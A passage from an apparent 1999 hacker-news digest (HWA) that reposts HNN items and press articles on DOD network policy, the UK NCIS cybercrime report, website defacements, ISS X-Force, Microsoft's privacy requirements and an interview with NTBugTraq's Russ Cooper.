Command, supports an ongoing NIPRNET redesign, which would involve the
Defense Information Systems Agency upgrading the network's security
measures. "What DISA's doing will protect DOD computing and still give us a
viable means of communicating with industry," Gauss said.
Lt. Gen. William Donahue, director of communications and information for the
Air Force, agreed that disconnecting NIPRNET from the Internet is not a viable
option. "We're not going to disconnect from the Internet because we depend on
it for too much," he said. But, he added, "You have to balance the need to
connect with the need to protect."
Although a decision has not yet been made about the third network, Donahue
envisions DOD reaching a stage where it initially will shut down all connections
between NIPRNET and the Internet, closing all "back door" connections, and
then reconnect DOD with a smaller number of open connections.
"There will probably be a finite number of connections to the Internet, and they
will be protected," Donahue said. When that occurs, DOD still will need "to be
serious, dedicated, dogged and persistent in protecting our network nodes," he
said.
But Campbell will continue to push to cut off DOD from the Internet. "If you
are going to be a pioneer...you cannot be faint of heart."
@HWA
76.0 NCIS Calls For National Computer Crime Squad
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
The UK National Criminal Intelligence Service (NCIS) has
called for the creation of a national cyber force in
England to fight the increasing amount of online crime.
While the Metro police in London do have a computer
crime unit there is no national organization.
BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_375000/375156.stm
Sci/Tech
Cyber criminals feel the heat
By Internet Correspondent Chris Nuttall
A national cyberforce of computer specialists is needed
to combat a rising tide of online crime, according to a
major report by the UK National Criminal Intelligence
Service (NCIS).
Project Trawler, a three-year study of Internet crime,
foresees a struggle between criminals and those trying to
prevent illegal activities over the mastery of Net technology
and information.
It says crimes currently being committed include
paedophilia, pornography, hacking, hate sites, fraud and
software piracy. Criminals' use of the Net for secure
communications is an emerging problem.
Interception powers being eroded
The director general of NCIS, John Abbott, told a news
conference:
"I believe that serious
consideration should be given
to the establishment of a
national investigative
computer crime unit to
combat the growing number
of computer crimes being
carried out in the UK and to
identify and target emerging
threats.
"Furthermore, any such unit
should be intelligence-led,
separating out the minor
offenders from those with
both the motivation and capability
to commit serious crimes."
On the day the Home Office released a consultation
paper on the review of the Interception of
Communications Act, the report says existing
capabilities to lawfully intercept communications and
search seized computers will be eroded by the Internet.
"Potentially this would seriously damage law
enforcement's ability to fight serious and organised
crime," it says.
Home Secretary to bolster interception
The Home Secretary, Jack Straw, said he was
determined his proposals would "maintain interception
as the most powerful weapon in the armoury against
crime."
"It often provides the vital intelligence or the crucial piece
of the jigsaw in solving such crimes with on average, one
in two interception warrants resulting in an arrest", he
said.
"But in recent years their capability has come under
threat - sophisticated criminals and terrorists have been
quick to exploit a revolutionised communications
industry and dated legislation on interception."
The proposals, detailed on the Home Office Website,
include creating a single legal framework to regulate
interception of all networks both public and private,
wireless telegraphy and interception of mail.
Encryption expertise needed
Regarding Project Trawler's recommendations, the
Metropolitan Police in London has a computer crime
unit, but there is no such national organisation.
MPs of the Trade and Industry Select Committee said
last month there was a case for such a body in order to
combat criminals using encryption to organise their
illegal activities over the Internet.
NCIS says a national unit would investigate the most
serious offences, develop Internet expertise and support
local forces encountering sophisticated cybercrimes.
Call for international co-operation
Given the global reach of the Net, the report emphasises
that international co-operation is also vital. This includes
combined law enforcement operations, extra-territorial
jurisdiction and consistent extradition of criminals.
It points out that last year's Operation Cathedral had
demonstrated the effectiveness of co-ordinated
international action by law enforcement against
paedophile rings. This involves both exchanging
information at the preliminary stage and preventing
paedophiles tipping off other ring members when arrests
and seizures are made.
The creation of a central library of known paedophilic
images at an international level would both aid the
search for victims and help to determine the nature of
offences, it says.
Cyber complaints on the rise
NCIS suggests that filed complaints of cyber crimes
have risen from 12,000 in 1997 to more than 40,000 in
1998.
But, in an apparent reference to media coverage of the
Internet, it says it does not assess the risks or scale of
criminal activity on the Internet to be as extensive as
sometime portrayed.
The report's author, David Hart, says there is a need for
preventative steps now to avoid having to deal with a
bigger problem later:
"If the rewards are great enough and the risks low
enough then undoubtedly established criminals will
migrate to the new territory of the Internet.
"But, at the moment, even if they had
the motivation, it's not evident that
they have the capability to commit
serious computer crimes. They could
recruit or coerce people who do have
the capabilities but there are associated risks with that."
Future threats
NCIS says the 1990 Computer Misuse Act allows for
penalties of up to five years in jail and unlimited fines.
In future, it says, offences inspired by political motives,
hacking for information with financial value and "work
rage" assaults on systems will feature more.
The approach of the year 2000 is likely to spur some
program writers to create viruses triggered by the
01/01/2000 date.
Project Trawler will be available on the NCIS Website in
an unclassified version. The full report with extensive
statistics will be available to law enforcement
agencies and government departments.
Report welcomed by cyber rights group
"The conclusions of the report and a multi-layered
approach is welcome for dealing with cybercrimes rather
than heavy-handed government regulation," said Yaman
Akdeniz, director of Cyber-Rights & Cyber-Liberties
(UK), reacting to Project Trawler.
"However, all these initiatives within the layers proposed
should take into account the rights and liberties of
Internet users."
He said the concerns expressed about the ability to
intercept communications revealed law enforcement
bodies were still worried about the use of cryptography
for criminal purposes.
"Overall the publication of the report is welcome and
most of the future problems may be avoided and
prevented by the use and development of better security
tools. Therefore the use and development of encryption
tools should be encouraged rather than controlled for the
prevention of cyber-crimes."
@HWA
77.0 !Hispahack Found Not Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by LeCreme
The trial against !Hispahack member Jfs finished on June
2nd. The Spanish judge found not guilty the only
!Hispahack member who was accused of breaking into a
university computer. This was the first case of
unauthorized computer intrusion ever judged in Spain.
!Hispahack
http://hispahack.ccc.de/en/index.htm
78.0 asahi.com Defaced
~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by YingYang
One of the major news sites in Japan, Asahi Shimbun
Publishing Co.'s "asahi.com" was defaced in the last few
days. The most interesting thing in this article is the
claim that the news site has suffered several cyber
intrusions in the past but that this was the first one to
cause damage.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/74419
Asahi Shimbun's News Site Suffers Illegal Access
June 22, 1999 (TOKYO) -- Asahi Shimbun Publishing Co.'s news site "asahi.com" was accessed
illegally and could not display the home page in a standard way for a few minutes on June 20.
According to Asahi Shimbun, the problem occurred because an outside person gained illegal
access to one of the company's several mirror servers. Within about 10 minutes,
the mirror server was separated off, and a switch was made to the other servers.
An investigation is focusing on the detailed circumstances and cause of the incident. From
June 20 to the morning of June 21, the company reinforced its surveillance setup. A full-
fledged investigation was set to start June 21, according to the company.
Asahi Shimbun's www.asahi.com has been subjected to illegal access a few times, but the
previous cases ended without causing any substantive damage. This was the first time that
the content was actually written over. As for illegal access to a newspaper company's
news site and rewriting of the top page, another incident occurred recently in Japan. Mainichi
Newspapers Co., Ltd.'s www.mainichi.co.jp, Mainichi INTERACTIVE suffered such a case on
June 12.
(BizTech News Dept.)
@HWA
79.0 NSTAC Releases Reports
~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by lamer
The National Security Telecommunications Advisory
Committee has released several new reports detailing
various aspects of federal computer security and
infrastructure.
NSTAC
http://www.ncs.gov/nstac/NSTACReports.html
@HWA
80.0 FBI This Week
~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by ne0h
"FBI, This Week" is the name of the radio program
broadcast to over 3,200 ABC Radio Network affiliates.
This week's episode is all about International Computer
Crime. If you miss the broadcast on your local station a
real player version is available.
FBI This Week
http://www.fbi.gov/pressrm/radio/fbiweek.htm
@HWA
81.0 Cartoon Hackers?? (From HNN rumours section)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by delchi
WB Scraps 'Real Hackers' Cartoon
Rumor has it that Warner Brothers and Mattel have
scrapped an idea for a new Saturday morning cartoon
with a tie in toy line called "Real Hackers". The defunct
storyline was to portray a group of real life hackers in
cartoon form, reformed and fighting for good. Amongst
the hackers to be represented were 'phiber optik',
'bernie s', 'death veggie', 'emmanuel goldstein' and 'weld
pond' as cyber warriors as they fought criminals bent on
destroying the internet. It is unknown why Warner
Brothers and Mattel scrapped this idea or if it even
existed in the first place but in this hot pre Christmas
marketplace, one can only wonder how long it will be
before this ground breaking idea starts making money
for somebody.
@HWA
82.0 Nuke Labs Stand Down
~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by Dr. Mudge
Yesterday was one of two stand down days at the
national weapons labs (Los Alamos, Sandia, LLNL, etc),
ordered by Energy Secretary Bill Richardson. This means
that due to the pressure and publicity from the
Cox/PFIAB reports no normal work was allowed at the
labs. Only emergency and operational tasks were to be
continued - 16 hours of training courses, web tests,
discussion groups, etc. over a two day period take
everything else's place. The training dealt with review of
existing security efforts, everything from operational to
computer security is being discussed, dissected, and
hopefully digested. While this may be an excellent way
to educate employees one can only hope that network
security monitoring and analysis is considered essential
daily activity.
Albuquerque Journal
http://www.abqjournal.com/news/1secrets06-21.htm
Future of Nuclear Weapons Program
in Dispute
By Jim Abrams
The Associated Press
WASHINGTON -- The head of a presidential panel on nuclear
weapons security, backed by congressional Republicans, says
security problems within the Department of Energy can't be
fixed without creating a new semi-independent agency to
oversee nuclear arms programs. But Energy Secretary Bill
Richardson said he is successfully confronting the security lapses
revealed in investigations of suspected Chinese spying at
weapons laboratories, and that no new agency is needed.
"We are ready to have a beefed-up security entity within
the Department of Energy that is stronger," Richardson said on
"Fox News Sunday." "What I don't want is a new agency that is
autonomous that does not report to me."
But former Sen. Warren Rudman, R-N.H., who chaired a
panel of the president's Foreign Intelligence Advisory Board that
issued a highly critical report of the DOE's counterintelligence
efforts last week, said the department has failed to carry out
two key security measures that President Clinton ordered 16
months ago.
It has yet to fully implement polygraph tests for scientists at
the labs and tighter security checks for foreign visitors, Rudman
said on NBC's "Meet the Press." "The attitude of people within
that department, in that bureaucracy, is astounding," he added.
The Washington Post reported today that the federal
government has begun administering polygraphs on the first of
5,000 nuclear weapons scientists and other sensitive employees
at DOE.
It could take four years to complete an initial round of
examinations on the federal workers and private contractors
working with highly classified nuclear secrets, said Edward J.
Curran, head of Energy's counterintelligence office.
So far, only that office's staff has been given the tests, he said.
Richardson told the Post some employees and civil liberties
groups are likely to protest the polygraphs and "I fully expect
lawsuits."
Richardson said there were still problems to resolve but "we
have had dramatic improvements." He said he ordered a
two-day stand-down at all the nuclear labs to test security
measures, and that he plans to dismiss some people responsible
for security lapses in about three weeks.
Richardson last week also named retired Air Force Gen.
Eugene Habiger, the former commander of all U.S. strategic
nuclear forces, to head security operations at DOE.
The president of the University of California, Richard C.
Atkinson, has ordered a review of security at the three nuclear
laboratories managed by the university to make sure national
security is not being compromised.
The FBI has investigated allegations that a former employee
of Los Alamos National Laboratory was a spy for China. The
university also manages Lawrence Livermore National
Laboratory and Lawrence Berkeley National Laboratory.
Atkinson has asked his Council on National Laboratories to
examine whether newly tightened measures are being
implemented and whether additional measures are needed. He
also wants to compare the university's security to the protocol
used by Lockheed Martin, which manages Sandia National
Laboratories in Albuquerque.
Rudman, meanwhile, is expected to receive a good reception
Tuesday when he testifies to Congress on his panel's
recommendation that the weapons program become
semi-autonomous, reporting only to the energy secretary.
"I agree with the Rudman report," said Sen. Richard Shelby,
R-Ala., chairman of the Senate Intelligence Committee. "We've
said all along that the labs are not safe today. They're not safe
tomorrow."
Richardson, he said, is trying to "seal the leaks at the labs.
He's trying to bring accountability to the labs. But I believe it's
going to take statutory change to do it. I don't believe ultimately
he can do it just by himself."
Shelby said Republican Sens. Frank Murkowski of Alaska, Jon
Kyl of Arizona and Pete Domenici of New Mexico would try to
attach language on such a separation of powers to an
intelligence spending bill coming before the Senate soon.
@HWA
83.0 X-Force Down Under is Hiring
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by solvant
Need a job? Live in Australia? X-Force, part of ISS, is
recruiting Australian security experts for their three
month old Australian office. We sure hope they do
thorough background checks, wouldn't want them hiring
any evil hackers by mistake. A quote from the article by
Chris Rouland of ISS "I don't go out and recruit hackers
per se; I look for very strong software engineers with a
deep understanding of security and strong knowledge of
the computer underground." If that isn't a hacker I don't
know what is.
Fairfax IT
http://www.it.fairfax.com.au/software/19990621/A56795-1999Jun21.html
Australians hack into the X-Force
By DAVID BRAUE
AN international anti-hacker organisation,
X-Force, is recruiting Australian security experts for an
Australian brigade.
X-Force is operated by the security software company
Internet Security Systems (ISS), which opened its
Australian office three months ago.
X-Force director Chris Rouland, in Brisbane last week
to speak at a conference on computer security incident
handling and response, said recruits for X-Force were
"very difficult to find".
"I don't go out and recruit hackers per se; I look for very
strong software engineers with a deep understanding
of security and strong knowledge of the computer
underground."
The Australian X-Force will join counterparts in London
and Atlanta in keeping tabs on the underground
community of hackers who attack government and
corporate computer networks.
Australian recruits will work while their overseas
counterparts sleep, allowing a 24-hour security
research organisation with global response capabilities.
The 50-strong X-Force continually folds, spindles and
mutilates commercial software to identify weaknesses
that might be taken advantage of by hackers.
Among its accomplishments was being the first to
decipher the insidious Back Orifice trojan horse virus
and produce a fix for the problem. "That was a good
exercise for us, a chance to stretch our legs," laughs
Rouland, about the application considered to be one of
the most dangerous hacker attacks of the decade.
Reports suggest the team's efforts are paying off: the
analyst firm Yankee Group recently reported ISS as
having 30 per cent of the $US315 million ($485 million)
adaptive security market, while the No 2 firm, Axent
Technologies, had 19 per cent.
Many of the team's innovations - including
proof-of-concept projects that are developed by a
special team known as Protoworx - end up as additions
to ISS's commercial suite of intrusion detection
software.
Recent X-Force work has produced the likes of the
Attack Tracker (which allows intrusion detection
systems to trace and identify incoming intruders);
Casper (a Linux server that offers itself as a tempting
target for hackers while collecting data on their break-in
attempts); and the new Total Surveillance Architecture.
@HWA
84.0 More Canadian RedBoxing from HackCanada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by RenderMan
Need a RedBox in Canada? Got a Diamond Rio for your
MP3s? One more reason for the authorities to hate MP3s
and the device. HackCanada has released a text file on
how to use your Diamond RIO as a RedBox.
HackCanada
http://www.hackcanada.com/canadian/phreaking/riobox.txt
85.0 SecureMac is Now Open
~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by MacUser
SecureMac.com has opened their doors this week to a
new site devoted to Macintosh Security. Learn more
about the security that exists for the mac, and how to
make your system more secure. Learn just how weak or
strong the security is on certain products as well. This
site covers encryption, security, virus, and much more.
This site is run by the same person who runs Freaks
Macintosh Archives a site devoted to macintosh hacking
and security.
SecureMac.com
http://www.securemac.com
Freaks Macintosh Archive
http://freaky.staticusers.net
@HWA
86.0 Microsoft Demands Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by Sangfroid
Following in IBMs footsteps Microsoft will now demand a
privacy statement be present on all web sites that it
buys advertising from. Why have the two largest
internet advertisers taken this stance? The FTC is about
to make its recommendations to congress about
whether tough new federal privacy laws should be
enacted. Of course this means that HNN will have to
post something about how you have no privacy and
that we log everything, but then so does every other
web site. It should be a fun page to write. Look for it in
the next few days.
Nando Times
http://www.techserver.com/story/body/0,1634,62850-99839-710835-0,00.html
Microsoft to require privacy statement before advertising on Web sites
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
By TED BRIDIS
WASHINGTON (June 22, 1999 11:21 p.m. EDT http://www.nandotimes.com) - Microsoft Corp., the largest advertiser on the Internet, has
decided it will not buy ads next year on Web sites that fail to publish adequate privacy promises to consumers. The announcement
comes less than three months after a similar decision by IBM, the Web's second-largest advertiser.
The actions by the two companies come as the Federal Trade Commission prepares its recommendations to Congress on whether tough new federal
privacy laws are needed to protect consumers online.
The Microsoft announcement to be made Wednesday was expected at a computer conference in New York and will take effect after the end of the year.
Microsoft said it spent about $30 million last year on Web ads - but that's still a small portion of the $2 billion spent last year on Web advertising,
according to the Internet Advertising Bureau.
Microsoft, which has lobbied with other industry groups against privacy legislation, earlier this year began offering a free digital tool kit that promises
to allow consumers to use next-generation software to restrict what personal details Web sites collect about them.
Consumers typically must manually find a company's online privacy statement, if one exists, and read through legalese to determine what personal
information a Web site might be harvesting, such as their name, e-mail address or even favorite authors or clothing sizes.
Last month, an industry-financed study showed businesses have made dramatic improvements since last year in warning people how companies use
personal information collected about them.
Nearly two-thirds of commercial Internet sites displayed at least some warning that businesses were collecting personal details from visitors, such as
names, postal and e-mail addresses, and even shopping tastes, the study found. But less than 10 percent of those sites had what experts consider
comprehensive privacy policies.
A similar study last summer by the FTC found only 14 percent of sites warned how companies used private information they collected about customers.
@HWA
87.0 Pentium III has 46 Bugs
~~~~~~~~~~~~~~~~~~~~~~~~~
June 23rd 1999
From HNN http://www.hackernews.com/
contributed by Kanuchsa
The Pentium III bug list, posted by Intel in PDF
format, lists 46 bugs, or "erratums" as Intel likes to call
them. Not much is planned in the way of hardware fixes,
mainly because Intel is calling them minor. One of them
is an FPU error which Intel apparently has no plans to
fix in the future.
The UK Register
http://www.theregister.co.uk/990617-000007.html
PDF Doc listing 'erratums' not bugs
ftp://download.Intel.nl/design/pentiumiii/specupdt/24445304.pdf
88.0 'War' Against FBI Continues
~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by dis-crete
F0rpaxe has struck again and this time defaced the web
site of the Naval Training Systems Center with some
serious rhetoric leveled against the FBI. DigiAlmighty
defaced the Naval Surface Warfare Center which is
slightly ironic as the Dahlgren division of NSWC helped
develop the Co-operative Intrusion Detection Evaluation
and Response program commonly referred to as the
'hacker tracker'. Additionally the web site for NASA's
Earth Observing System Data and Information System
has been defaced by the Keebler Elves. HNN has mirrors
of all three sites available. (Mirrors provided by
attrition.)
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0621/web-navyhack-6-23-99.html
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
JUNE 23, 1999 . . . 7:52 EDT
Hacker groups target Navy sites
BY BOB BREWIN (antenna@fcw.com)
AND DIANE FRANK (diane_frank@fcw.com)
In the wake of attacks on the FBI World Wide Web
sites earlier this month, hacker groups have now
turned their attention to the Navy, including the Web
site of a Navy organization that helped develop
sophisticated hacker-tracker software.
Last week a hacker defaced the Web site
(www.nswc.navy.mil) of the Naval Surface Warfare
Center's Dahlgren, Va. division with a mostly obscene
message that read in part, "FEDS: You will never stop
my FLOW. Nice try, though. Killing my hotmail
account and all that. HAHHAHA." The Dahlgren
division of NSWC helped develop the Co-operative
Intrusion Detection Evaluation and Response program
(www.nswc.navy.mil/ISSEC/CID/), which uses
automated tools to track and analyze hacker attacks.
Another hacker -- who, based on the postings on the defaced Navy Web sites,
may be engaged in a hacker duel with the Dahlgren attacker -- hit the Web site of
the Naval Air Warfare Center Training Systems Division (www.ntsc.navy.mil),
Orlando, Fla.
This hacker, who affiliated himself with the group f0rpaxe, said on the defaced
Navy page, "We own the Naval Air Warfare Center Systems Training Division.
FBI spokesman said we were only doing some gov and mil servers [but] we
rooted Naval Air Warfare Training Center....We had been exploring entire
servers until today."
Navy spokesmen have not returned calls from FCW asking for comment on the
Web attacks.
89.0 Singapore Officials Arrest Two
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by Dioxin
Two individuals have been arrested for violations of the
Computer Misuse Act for their involvement in the recent
web defacements of www.tcs.gov.sg and
www.mediacity.com.sg (Television Corporation of
Singapore). Apparently, they had forgotten to spoof
their addresses before they committed the dirty act.
They face a maximum S$10,000 fine and up to
three years in jail. Speculation is that they used the
new malformed .htr request bug in IIS to gain entry to
the servers.
The Straits Times
http://straitstimes.asia1.com.sg/cyb/cyb1_0624.html
(Link not found June 25th - Ed)
90.0 GSA Looking for IDS
~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by erewhon
The General Services Administration is looking for
vendors to set up and manage intrusion detection
systems for civilian agency networks to monitor for
cyber intrusions. The GSA plan calls for information
gathered by the system to be sent to a central facility
in Washington DC for analysis.
Federal Computer Week
http://fcw.com/pubs/fcw/1999/0621/web-gsa-6-23-99.html
JUNE 23, 1999 . . . 11:10 EDT
GSA seeks tools, services to monitor government
nets
BY DIANE FRANK (diane_frank@fcw.com)
The General Services Administration is seeking vendors qualified to set up and
manage hardware and software to monitor civilian agency networks for security
breaches, the agency announced today.
The project, being managed by the GSA Federal Technology Service's Office of
Information Security, aims to build a full intrusion-detection system that will
enable agencies to identify and collect information on external attacks on federal
information technology resources, according to a notice published in Commerce
Business Daily. The program initially will focus on identifying external attacks
on agency systems.
Under GSA's plan, information collected by the system will be transmitted
almost immediately to a central analysis facility in the Washington, D.C., area.
@HWA
91.0 Theres Money in them thar videos! (DEFCON WEBCAST)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
DefCon Live WebCast
contributed by Shanners
Unable to make it to Las Vegas this year? HNC Network,
an HNN Affiliate, will be conducting a live webcast from
the show floor. They will cover Hacker Jeopardy, Hacker
Death Match, as well as numerous live interviews with
speakers and attendees, and some recorded material.
There will also be prizes given away through the
webcast like Free/OpenBSD, RH 5.2 and Hackers Secrets
5. They are charging $29.95 for the three day
broadcast.
Live Defcon Webcast
http://www.hack-net.com/defcon
(I dunno, you make your own decisions on this one ... - Ed)
92.0 Kasparov Defaced?
~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by macwizard
Well, something has been going on with the World vs.
Kasparov Chess Match. Microsoft says it was technical
difficulties due to server overload. We have received a
few emails saying that the site was indeed broken into.
It is claimed that the password to the site was sniffed
and that is how entry was gained. Unfortunately we are
unable to confirm either the MS position or the emails.
BBC
http://news2.thdo.bbc.co.uk/hi/english/sci/tech/newsid%5F376000/376147.stm
Sci/Tech
Kasparov's chess pieces
disappear
Kasparov will have 24 hours per move
As the world's chess fans gathered on the Internet to pit
their wits against champion Garry Kasparov, unorthodox
rooks, knights, bishops and queens began appearing
and disappearing on the board.
Billed as the greatest Internet chess challenge ever, the chance
to log on and compete against the world's greatest player attracted
over two million hits in the first few hours.
But the Microsoft Gaming Zone Web
site hosting the tournament was not up to the challenge.
As Bob Sullivan, technology reporter with MSNBC News
watched, things began to go wrong, before a single move
had been played.
"Chess pieces were landing all over the board," Mr
Sullivan reported.
According to MSNBC, the problems were due to server
overload - a technical hitch rather than a hacker spoiling
the site on purpose.
"It is certainly an embarrassment for the company," said
Mr Sullivan.
First move
After Mr Kasparov's opening move (Pawn to E-4) in New
York on Monday, he travelled to Washington, DC, where
users guided by four young chess experts initiated the
"Sicilian Defence", moving pawn to C-5.
The World Team's first move was chosen by 41% of
those voting.
Kasparov declined to make another move in order to
maintain the "suspense," said Audrey Waters, the
chess champion's spokeswoman. He has 24 hours to
respond.
Deep Blue challenge
Mr Kasparov is widely regarded as the greatest chess
player ever. He has been particularly strong over the last
few months with three convincing tournament victories in
a row.
In 1996 and 1997, he played two six-game matches against the Deep
Blue computer, winning the first and losing the second.
Millions of Net users are believed to have followed those games.
It was the first time a computer had defeated a reigning
world champion in a match played under classical chess
rules. The chances of the world beating Mr Kasparov
seem lower.
@HWA
93.0 Russ Cooper Interview
~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by Space Rogue
MSNBC has an excellent interview with Russ Cooper, the
NTBugTraq administrator. If you subscribe to
NTBugTraq, or even if you don't, you should read this.
MSNBC
http://www.msnbc.com/news/283054.asp
Surgeon general
of the Web?
NTBugTraq’s Russ Cooper
serves as independent authority
on bugs, viruses,
security issues
By Bob Sullivan
MSNBC
June 23 — The eruption of a new computer virus
often leads to massive confusion. Besieged system
administrators and confused users need hard
information about what the danger is and what to
do, but it’s elusive. Adding to the confusion,
anti-virus software companies issue
superlative-laden press releases, perhaps
exaggerating the real threat. Meanwhile, software
vendors like Microsoft often downplay the threats
to prevent bad PR. In the middle of this maelstrom
is Russ Cooper.
WHO’S RUSS COOPER? He’s the owner and
administrator of perhaps the most popular security mailing list
on the Internet, NTBugTraq — a sort of emergency
broadcast system for computer network administrators.
When any security hole is found, it’s posted to this list,
sometimes even before Microsoft or anti-virus companies
know about it. (Microsoft is a partner in MSNBC.)
In fact, it’s a pelt of honor to be the first to send Cooper
a bug, and posters do so sometimes to attract the attention of
future employers.
As the human filter for NTBugTraq’s 25,000 very
devoted members, Cooper serves as a kind of referee for
groups arguing about the authenticity and severity of
computer crises, but he has his sights set on a loftier goal. He
views himself as the surgeon general of the Internet. His
grand plans include launching an Internet security “portal”
Web site called Securityadvice.com in the fall.
WITHOUT THE MARKETING SPIN
“I just want to try and be a consistent voice to the
masses for these types of issues,” Cooper said.
“Trying to give the facts in a way people can understand
that doesn’t overemphasize the threat. ... I don’t try and
downplay things, but I’m not trying to get a stock increase out
of [announcements]. I want people to be informed of the
facts without the marketing spin.”
His bare-bones, straightforward style came through on
April 23, just before the Windows CIH/Chernobyl virus hit.
While anti-virus companies and media outlets were warning
of potential data devastation that never materialized in the
United States, Cooper sent this note to his list: “The CIH
virus might cause problems on Monday, April 26th, for some
of you. Do a virus scan before 4/26/99. Check with your
anti-virus vendor if you don’t know what it is, or see;
http://www.antivirus.com/vinfo/alerts.htm for more info. ‘nuff
said here.”
Securityadvice will be a commercial site, and Cooper
says his bankers have raised $2 million. But for now, he
administers NTBugTraq and its companion Web site out of
the goodness of his heart (the Web site does take in about
$7,000 to $8,000 in advertising a month, enough to pay for a
secretary and cover expenses).
COOPER’S GIRLFRIEND
Cooper’s heart shone through six weeks ago when the
39-year-old divorced man decided he was tired of living alone
and took out a half-page personal ad in the local Lindsay,
Ontario, newspaper, headlined, “Meg Ryan, where are you?”
“I own my own business working on the Internet,
became internationally recognized in my field, and moved to
Lindsay to enjoy an idealistic lifestyle of working from
home,” he wrote in the ad.
Days later, a bus driver who read the ad set him up, and
he has spent his weekends with Kathy ever since.
But his weekdays, and weeknights, are devoted to the
list. Cooper now spends 12 to 14 hours Monday through
Friday in front of a computer screen. That includes the
computer screen that hovers over his bed, hospital tray style.
A COMPUTER IN HIS BOAT?
“I can sit in bed and type and read away. I can do a
quick check when I get up in the morning. ... I haven’t
figured out how to get one in my boat yet,” Cooper joked. “In
this role I have to be real responsive timewise.”
Included in this labor of love are hours of free consulting
Cooper offers to the 25,000 list members who send notes
with possible “exploits.” He edits every note that comes in,
removing redundant e-mails, posting only verifiable
information. As often as not, a flaw sent to the list is caused
by human error, not a computer bug, and Cooper offers free
help desk-like advice to fix the problem. That keeps traffic on
the list down to a trickle of about 10 messages or so per day
— but all of them laser-focused.
“People have told me in the past that they read every
message I send and are prepared to react to every message I
send,” Cooper said.
THE IMPRESSIVE AUDIENCE
Among those ready to react to every Cooper message:
Jason Garms, the lead product manager for Windows NT
security at Microsoft, who’s a list member. Even though
Cooper’s list is devoted to publicly flogging (some might say
embarrassing) Microsoft by revealing flaws in Windows NT,
Garms says he has a good, personal working relationship with
Cooper. They correspond by e-mail as often as once a week.
“We don’t always see eye to eye with Russ,” said
Garms, who has worked with Cooper since NTBugTraq
went online in 1997 and isn’t crazy about times the list has
posted exploits before Microsoft has had the time to fix the
problem. After all, hackers monitor the list, too. “But we’ve
had a good working relationship,” Garms said. “Russ provides
an important service.... The reality is, an independent forum
is always going to be useful.”
Anti-virus vendors also sit poised to act on every
Cooper-NTBugTraq note — even Network Associates,
which Cooper has frequently criticized for exaggerating
security threats.
“It forces companies to keep on their toes,” said Dan
Takata, spokesman for Data Fellows Inc., another security
company. “He can’t always make everyone happy. He has
gotten flamed by top anti-virus people, but I think he’s doing a
valuable service.”
PROVING GROUNDS
Living in between software vendors and security firms
might sound like precarious work, but Cooper’s eclectic
background serves as solid preparation. He spent most of
1984-1990 running banking networks in Liberia, Africa. He
didn’t return to Canada until he was forced out during the
Liberian Revolution. He then took a job at the University of
Toronto trying to make Novell’s Netware, Oracle software,
an IBM mainframe and Windows 3.1 all work together.
During this time, he honed the fine art of pestering software
vendors by telephone, forcing them to support their products.
“I follow instructions, and when it doesn’t work, I tell
them I’m going to sue,” he said. “Asking questions is a skill.
Asking questions of a vendor is an art.”
AVOIDING RELIGIOUS WARS
Later he went to work for Tandem Computers and
subsequently held various networking jobs implementing
Microsoft software. As the Internet explosion unfolded, he
monitored mailing lists that continually slammed Windows NT
security. But in many cases, posters were making religious
statements such as “switch to Linux” more than they were
engaging in a scientific debate over what NT could or
couldn’t do. So in 1997, he filled that gap with NTBugTraq.
And thus began Cooper’s odd role as a constant public
flogger of NT’s flaws — and perhaps NT’s most public
independent supporter.
“I’m just trying to get rid of some of the religious
arguments going on,” Cooper said. “There are people bashing
NT because they didn’t know what it could do. I wanted to
get intelligent security people to tell me the real issues with
NT.”
The list now acts as a filtering service both for Microsoft
and for NT users. Instead of hundreds of e-mails from
hundreds of administrators landing at Microsoft headquarters
in Redmond, Wash., Cooper offers this promise: “You post to
NT BugTraq, and I’ll follow up with Microsoft. ... They
know if something’s coming from me, it has had a bit more
work done on it.”
SECURITYADVICE.COM
The list doesn’t just cover Windows NT administration
issues — it touches anything that might impact a computer
professional running a Windows-based network. That made
NTBugTraq a solid place for information on the most recent
security/virus crises, such as Melissa and ExploreZip.
But now he plans to expand that expertise, to all security
issues facing all Internet users.
“We’ll have two communities — one being the experts
and the other being the Mom and Pop side,” Cooper said.
He’ll then work to convince normal Internet users about the
importance of security issues. Regular contributors will
include Vin McClellan, an expert in cryptography, and Robert
Abbott, sometimes known as the father of Internet security.
Abbott was also the technical advisor for the cybercrime cult
movie “Sneakers.” And of course, information will be
available in e-mail format.
Cooper and his Securityadvice.com concept have their
